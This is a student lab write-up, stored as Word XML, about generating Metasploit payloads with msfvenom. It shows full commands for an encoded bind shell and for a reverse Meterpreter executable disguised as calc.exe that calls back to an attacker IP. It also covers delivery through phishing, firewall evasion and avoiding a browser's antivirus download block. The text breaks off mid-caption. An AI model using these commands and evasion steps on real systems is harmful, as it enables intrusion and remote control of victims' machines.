    <w:p w14:paraId="0D69A773" w14:textId="386A3BA1" w:rsidR="00460E99" w:rsidRPr="00000726" w:rsidRDefault="00F12496" w:rsidP="00000726">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc85145534"/>
      <w:r w:rsidRPr="00000726">
        <w:lastRenderedPageBreak/>
        <w:t>Technical Context</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="1C3FBD0B" w14:textId="2D926B1A" w:rsidR="00E43B71" w:rsidRDefault="008C4DB2" w:rsidP="00BD0A07">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> utilizes various command line arguments and flags to specify the various intended options when executed. Running the following command `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t xml:space="preserve"> -a x86 --platform Windows -p windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t xml:space="preserve"> -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t xml:space="preserve"> -b '\x00' -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C4DB2">
        <w:t xml:space="preserve"> 3 -f python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">` tells the program to create an exploit for a Windows target running on x86 32-bit architecture, -p is the flag to specify the payload which is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Windows shell, -e specifies the encoder to use, -b specifies a list of characters to avoid in hexadecimal format, -i is the number of times to encode the payload, and finally -f is the format to return the output in. In the exploit that we created for this lab, we added two variables to the end of the command to add in out attacker machine IP address and port to connect back to. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65238495" w14:textId="1507CDBA" w:rsidR="008C4DB2" w:rsidRDefault="008C4DB2" w:rsidP="00BD0A07">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Just because we have a working exploit that will connect back to us upon execution, it doesn’t mean everything is automatically compromised. We still need to find a way to have someone execute the payload on a vulnerable machine. If nobody runs it, it’s useless. Also, if it’s executed on a patched machine that isn’t vulnerable to the payload we chose, it’s also useless. This means that a fair amount of reconnaissance needs to be done to try and identify, as specific as possible, the version of the operating system that we’re trying to exploit. If we are targeting a specific machine or individual like in this lab, you configure it specifically for that, however, in a real world scenario an attacker might just choose a payload that has a higher percentage of working across a large population of machines and then send it out to as many people as possible via phishing emails or watering hole attacks or something else </w:t>
      </w:r>
      <w:r w:rsidRPr="008C4DB2">
        <w:t>(What Is a Watering Hole Attack?, n.d.)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If the payload has a 20% of being successful, but you can get 100 people to execute it, you’ll still have compromised 20 machines. This happens to be the primary difference between spear phishing attacks and traditional ‘spray and pray’ phishing attacks </w:t>
      </w:r>
      <w:r w:rsidRPr="008C4DB2">
        <w:t>(KnowBe4, n.d.)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C0EBE" w14:textId="027575EC" w:rsidR="008C4DB2" w:rsidRDefault="008C4DB2" w:rsidP="00BD0A07">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>In order for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this attack to be successful, the final step is to ensure that the target machine can communicate out to the attacking machine on the port you specify. Traditionally organizations tend to have </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fairly strict</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> firewall rules on what traffic is allowed in their network, but many these days are stateful firewalls that allow established </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">connections back in. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> if they have little to no outbound rules, you can connect through on a unused port like 666 otherwise you might have to try to mimic more well-known traffic ports like HTTP on 80 or 443 or DNS on port 53. Newer, next-gen firewalls can do inspection on traffic on commonly used ports to ensure that traffic on port 53 is DNS traffic, or traffic on 443 is encrypted. However, if you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>are able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> bypass these checks, and get the connection through, you’ll be on the inside of the network with little trouble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047AD6C9" w14:textId="77777777" w:rsidR="008C4DB2" w:rsidRDefault="008C4DB2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:kern w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC6CDC9" w14:textId="6F39991A" w:rsidR="00F12496" w:rsidRDefault="00F12496" w:rsidP="00000726">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc85145535"/>
      <w:r w:rsidRPr="00000726">
        <w:lastRenderedPageBreak/>
        <w:t>Solution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="54B66819" w14:textId="700E3057" w:rsidR="008C4DB2" w:rsidRDefault="008C4DB2" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The first step in this lab is to start up the Kali Linux VM and the Vulnerable Windows Host.</w:t>
      </w:r>
      <w:r w:rsidR="00905DB6">
        <w:t xml:space="preserve"> Then we are going to console </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00905DB6">
        <w:t>in to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00905DB6">
        <w:t xml:space="preserve"> the Kali box and open a terminal window. At the terminal prompt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00905DB6">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00905DB6">
        <w:t xml:space="preserve"> to root and then we type `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00905DB6">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00905DB6">
        <w:t xml:space="preserve"> --help` to get a list of options for the command, and then type `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00905DB6">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00905DB6">
        <w:t xml:space="preserve"> -l payloads` to list </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00905DB6">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00905DB6">
        <w:t xml:space="preserve"> the payloads available of which there are hundreds. Next, we run `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00905DB6">
        <w:t>mkdir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00905DB6">
        <w:t xml:space="preserve"> -p /home/student/Desktop/shellcode` to create a new directory on the student </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00905DB6">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00905DB6">
        <w:t xml:space="preserve"> desktop. The last step of preparation is to run `ifconfig eth0` to find the IP address of this attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D504A51" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="008C4DB2" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A2BFD1F" wp14:editId="6C39D53D">
            <wp:extent cx="5771213" cy="2494447"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1"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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5775880" cy="2496464"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F92CF35" w14:textId="2DF87793" w:rsidR="008C4DB2" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231BB61D" w14:textId="77777777" w:rsidR="008C4DB2" w:rsidRDefault="008C4DB2">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193D56C2" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="008C4DB2" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B3B26C6" wp14:editId="425C0478">
            <wp:extent cx="5538866" cy="3987984"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture 10"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ext&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5547717" cy="3994356"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="449E1539" w14:textId="144CB9C2" w:rsidR="008C4DB2" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> list payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662499C8" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5332EAF8" wp14:editId="206C200A">
            <wp:extent cx="4144780" cy="745333"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="17" name="Picture 1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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4196892" cy="754704"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F22403F" w14:textId="63EFF633" w:rsidR="008C4DB2" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - create shellcode directory and change to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484B7CDC" w14:textId="1301D958" w:rsidR="00905DB6" w:rsidRDefault="00905DB6">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D25CC5E" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD19970" wp14:editId="6AE01CE5">
            <wp:extent cx="4429593" cy="1330518"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="18" name="Picture 18"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Picture 18" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4455638" cy="1338341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FBBB24" w14:textId="401F8809" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Identify local IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C59352" w14:textId="6F8E5F87" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>Now that we’ve done our basic recon, we run `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a x86 --platform windows -f exe LHOST=10.1.125.109 LPORT=666 -o /home/student/Desktop/shellcode/calc.exe`. This creates an executable called calc.exe that will execute a reverse TCP Meterpreter shell on a vulnerable windows </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">host and connect to IP 10.1.125.109 on port 666. An attacker would have to distribute the exploit to a vulnerable host and convince the end user to execute it, this would likely be done with a phishing email or a water hole attack. We are going to use the Python module for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to host the file and then browse to it from the Windows machine to download it. On the Windows VM Chrome will browse to the Python web server, but it’s internal AV and security settings will not let you download calc.exe because it can see that it is an exploit. If we attempt to download the file with Internet Explorer, those security settings do not exist so we can save the file to our desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19C9DC" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FBACDB8" wp14:editId="12E99583">
            <wp:extent cx="5358984" cy="792435"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19" name="Picture 1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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5401208" cy="798679"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53996C72" w14:textId="167FE595" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> - create the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD7261C" w14:textId="77777777" w:rsidR="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5425336C" wp14:editId="1E58B0F6">
            <wp:extent cx="5463915" cy="499847"/>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17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5526367" cy="505560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB60124" w14:textId="3930A5C8" w:rsidR="00905DB6" w:rsidRPr="00905DB6" w:rsidRDefault="00905DB6" w:rsidP="00905DB6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905DB6">
        <w:rPr>
          <w:sz w:val="16"/>
